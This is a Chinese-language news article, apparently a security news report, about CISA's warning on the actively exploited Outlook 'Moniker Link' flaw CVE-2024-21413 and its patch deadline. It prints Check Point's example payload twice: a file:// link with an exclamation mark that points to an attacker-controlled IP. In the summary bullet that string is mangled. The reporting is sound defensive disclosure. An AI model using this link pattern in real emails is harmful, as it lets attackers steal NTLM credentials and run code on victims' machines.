美国网络安全与基础设施安全局（CISA）警告联邦机构，需警惕针对微软Outlook关键远程代码执行漏洞（CVE-2024-21413）的攻击。该漏洞源于Outlook处理恶意链接时输入验证不当，攻击者可绕过受保护视图，以编辑模式打开恶意Office文件，从而执行远程代码。攻击利用“Moniker Link”绕过Outlook内置保护，通过file://协议和添加感叹号的URL指向攻击者服务器。CISA已将此漏洞添加到已知被利用漏洞目录，要求联邦机构在2月27日前完成修复，并建议私营企业也优先修复。

⚠️ **漏洞详情：** CVE-2024-21413 漏洞存在于 Microsoft Office LTSC 2021、Microsoft 365 企业版应用、Microsoft Outlook 2016 以及 Microsoft Office 2019 等多个 Office 产品中。攻击者通过构造包含恶意链接的电子邮件，利用该漏洞绕过 Outlook 的安全机制，从而执行任意代码。

🛡️ **绕过机制：** 攻击者利用名为 “Moniker Link” 的安全漏洞，绕过 Outlook 对嵌入在电子邮件中的恶意链接的内置保护机制。他们通过 file:// 协议，并在指向攻击者控制服务器的 URL 后添加感叹号来实现这一点，例如 `file:///\10.10.111.111 est est.rtf!something`。

🚨 **CISA 警告与要求：** CISA 已将 CVE-2024-21413 漏洞添加到其已知被利用漏洞（KEV）目录中，并标记为正在被积极利用。根据《约束性操作指令（BOD）22 – 01》的要求，联邦机构必须在三周内，即 2 月 27 日前，保障其网络安全，修复该漏洞。

周四，美国网络安全与基础设施安全局（CISA）警告美国联邦机构，要保护其系统，抵御针对微软 Outlook 关键远程代码执行（RCE）漏洞正在发起的攻击。 该漏洞由 Check Point 漏洞研究员李海飞发现，编号为 CVE – 2024 – 21413。其成因是在使用存在漏洞的 Outlook 版本打开包含恶意链接的电子邮件时，输入验证不当。 攻击者之所以能获得远程代码执行能力，是因为该漏洞使他们能够绕过受保护视图（受保护视图本应通过以只读模式打开 Office 文件来阻止嵌入其中的有害内容），并以编辑模式打开恶意 Office 文件。 一年前，微软在修复 CVE – 2024 – 21413 漏洞时也曾警告，预览窗格是一个攻击途径，即便在预览恶意构造的 Office 文档时，也可能导致攻击得逞。 正如 Check Point 所解释的，这个名为 “Moniker Link” 的安全漏洞，使得威胁行为者能够绕过 Outlook 对嵌入在电子邮件中的恶意链接的内置保护机制。他们利用 file:// 协议，并在指向攻击者控制服务器的 URL 后添加感叹号来实现这一点。 感叹号紧跟在文件扩展名之后添加，同时还会加上随机文本（Check Point 在示例中使用了 “something”），如下所示： <a href="file:///\10.10.111.111\test\test.rtf!something">CLICK ME</a> CVE – 2024 – 21413 影响多种 Office 产品，包括 Microsoft Office LTSC 2021、Microsoft 365 企业版应用、Microsoft Outlook 2016 以及 Microsoft Office 2019。成功利用 CVE – 2024 – 21413 漏洞发起的攻击，可能导致 NTLM 凭证被盗取，以及通过恶意构造的 Office 文档执行任意代码。 周四，CISA 将该漏洞添加到其已知被利用漏洞（KEV）目录中，并标记为正在被积极利用。根据《约束性操作指令（BOD）22 – 01》的要求，联邦机构必须在三周内，即 2 月 27 日前，保障其网络安全。 “这类漏洞是恶意网络行为者常用的攻击途径，给联邦企业带来重大风险，” 该网络安全机构警告称。 虽然 CISA 主要专注于提醒联邦机构尽快修复漏洞，但也建议私营企业优先修复这些漏洞，以抵御正在进行的攻击。